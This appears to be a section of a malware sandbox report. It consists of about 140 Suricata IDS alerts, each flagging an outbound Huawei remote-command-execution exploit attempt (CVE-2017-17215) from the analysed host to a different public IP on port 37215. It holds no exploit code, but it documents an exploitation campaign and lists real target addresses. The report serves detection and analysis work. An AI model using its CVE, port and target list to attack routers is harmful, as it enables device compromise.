                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35724 -> 197.65.49.208:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40960 -> 197.93.42.45:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42732 -> 41.148.39.65:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32884 -> 197.135.13.171:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50000 -> 197.151.26.135:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54768 -> 94.124.28.142:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59744 -> 41.68.180.141:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40970 -> 41.128.224.142:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53050 -> 157.84.210.48:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59650 -> 41.184.195.212:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58426 -> 41.1.21.191:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60462 -> 157.187.30.134:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37182 -> 197.136.165.192:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56842 -> 157.205.55.133:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38970 -> 157.229.200.23:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36918 -> 41.207.19.249:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37270 -> 157.150.141.7:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36348 -> 32.125.229.250:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54022 -> 196.121.163.2:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45740 -> 157.206.41.66:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47626 -> 41.32.63.178:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37182 -> 44.60.254.151:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33764 -> 162.140.19.100:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38020 -> 104.146.197.130:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59058 -> 157.184.243.106:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40922 -> 41.222.31.114:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35356 -> 197.41.219.56:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42168 -> 41.80.163.101:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53812 -> 41.244.59.172:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46600 -> 87.1.86.160:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44208 -> 197.219.160.195:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54518 -> 41.64.9.64:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53158 -> 41.225.75.163:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48618 -> 1.58.90.43:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53632 -> 157.168.126.12:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47092 -> 197.39.219.109:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46876 -> 41.49.2.45:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54814 -> 41.62.45.244:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49794 -> 197.83.28.186:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45418 -> 157.112.133.173:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52584 -> 197.16.79.63:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53464 -> 120.235.170.17:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40866 -> 157.88.180.83:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45344 -> 157.10.113.82:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59458 -> 197.175.69.120:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47040 -> 157.37.151.144:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47678 -> 197.95.57.41:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45252 -> 206.94.13.239:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50552 -> 60.84.71.231:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41956 -> 157.195.231.218:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41714 -> 41.118.64.109:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55372 -> 197.175.90.180:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56270 -> 157.44.54.49:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45958 -> 41.169.185.218:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39674 -> 157.84.216.173:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33474 -> 176.99.99.153:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44898 -> 41.83.220.180:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44370 -> 41.8.252.25:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59798 -> 157.61.214.137:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50996 -> 197.75.214.52:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44018 -> 41.54.87.17:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60084 -> 197.33.187.97:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34582 -> 157.81.79.188:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55296 -> 197.48.247.2:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37814 -> 129.252.197.57:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53400 -> 41.134.6.60:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34468 -> 197.67.232.170:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49220 -> 197.225.175.252:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42992 -> 50.190.215.187:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55964 -> 157.28.128.92:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50270 -> 157.55.140.74:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59408 -> 153.252.243.40:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58024 -> 41.57.113.96:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50368 -> 41.140.91.101:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34290 -> 157.64.101.69:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50348 -> 31.24.235.122:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33184 -> 157.2.141.167:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34872 -> 197.18.153.90:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56264 -> 157.55.196.142:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51636 -> 157.111.20.240:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58812 -> 41.233.5.68:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44082 -> 178.252.128.75:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48472 -> 197.57.203.211:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36082 -> 157.37.31.59:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47048 -> 164.255.14.90:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37880 -> 157.88.173.39:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36346 -> 157.136.152.32:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56798 -> 197.23.201.185:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33960 -> 197.222.117.226:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58200 -> 197.54.202.140:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60152 -> 41.91.145.134:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58760 -> 157.127.133.27:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60850 -> 157.175.28.248:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42444 -> 2.31.239.250:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43486 -> 157.19.234.37:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59972 -> 41.41.190.113:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51738 -> 17.150.66.36:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34906 -> 41.242.160.205:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56584 -> 197.182.31.152:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34752 -> 157.201.72.167:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33588 -> 201.38.238.103:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40968 -> 41.188.65.47:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59124 -> 37.52.251.95:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55842 -> 41.125.39.241:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36690 -> 197.113.243.190:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44660 -> 157.190.16.205:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55396 -> 199.107.14.60:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33542 -> 41.219.75.102:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35742 -> 157.191.46.194:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47476 -> 197.197.206.133:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40552 -> 157.169.74.37:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35822 -> 197.30.26.229:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40242 -> 197.59.216.136:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54588 -> 197.35.54.44:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52480 -> 197.142.0.55:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59700 -> 197.187.66.14:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56846 -> 197.195.16.157:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51508 -> 41.153.68.209:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51500 -> 113.44.184.65:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39840 -> 197.129.199.174:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53254 -> 51.196.229.35:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45560 -> 197.23.252.195:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37660 -> 41.132.251.177:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52698 -> 54.221.26.248:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39644 -> 157.34.229.11:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49430 -> 41.231.37.238:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45774 -> 41.57.176.178:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60088 -> 41.45.0.223:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56834 -> 180.105.253.180:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58080 -> 157.23.225.31:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58058 -> 157.69.214.33:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60914 -> 41.251.158.168:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42328 -> 157.165.238.189:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48180 -> 197.241.112.155:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54748 -> 60.169.19.81:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38026 -> 41.67.147.31:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57378 -> 41.199.224.220:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52468 -> 157.28.201.175:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42806 -> 164.250.160.64:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33008 -> 41.155.108.57:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33114 -> 197.229.79.73:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36958 -> 157.97.152.105:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59444 -> 157.95.248.174:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38492 -> 41.63.235.39:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52138 -> 41.58.251.240:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60310 -> 143.41.171.247:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46310 -> 169.54.46.63:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47702 -> 197.133.70.241:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35042 -> 197.120.11.3:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51522 -> 166.75.152.231:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53492 -> 157.103.22.219:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33418 -> 41.135.116.150:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51030 -> 210.186.123.119:37215
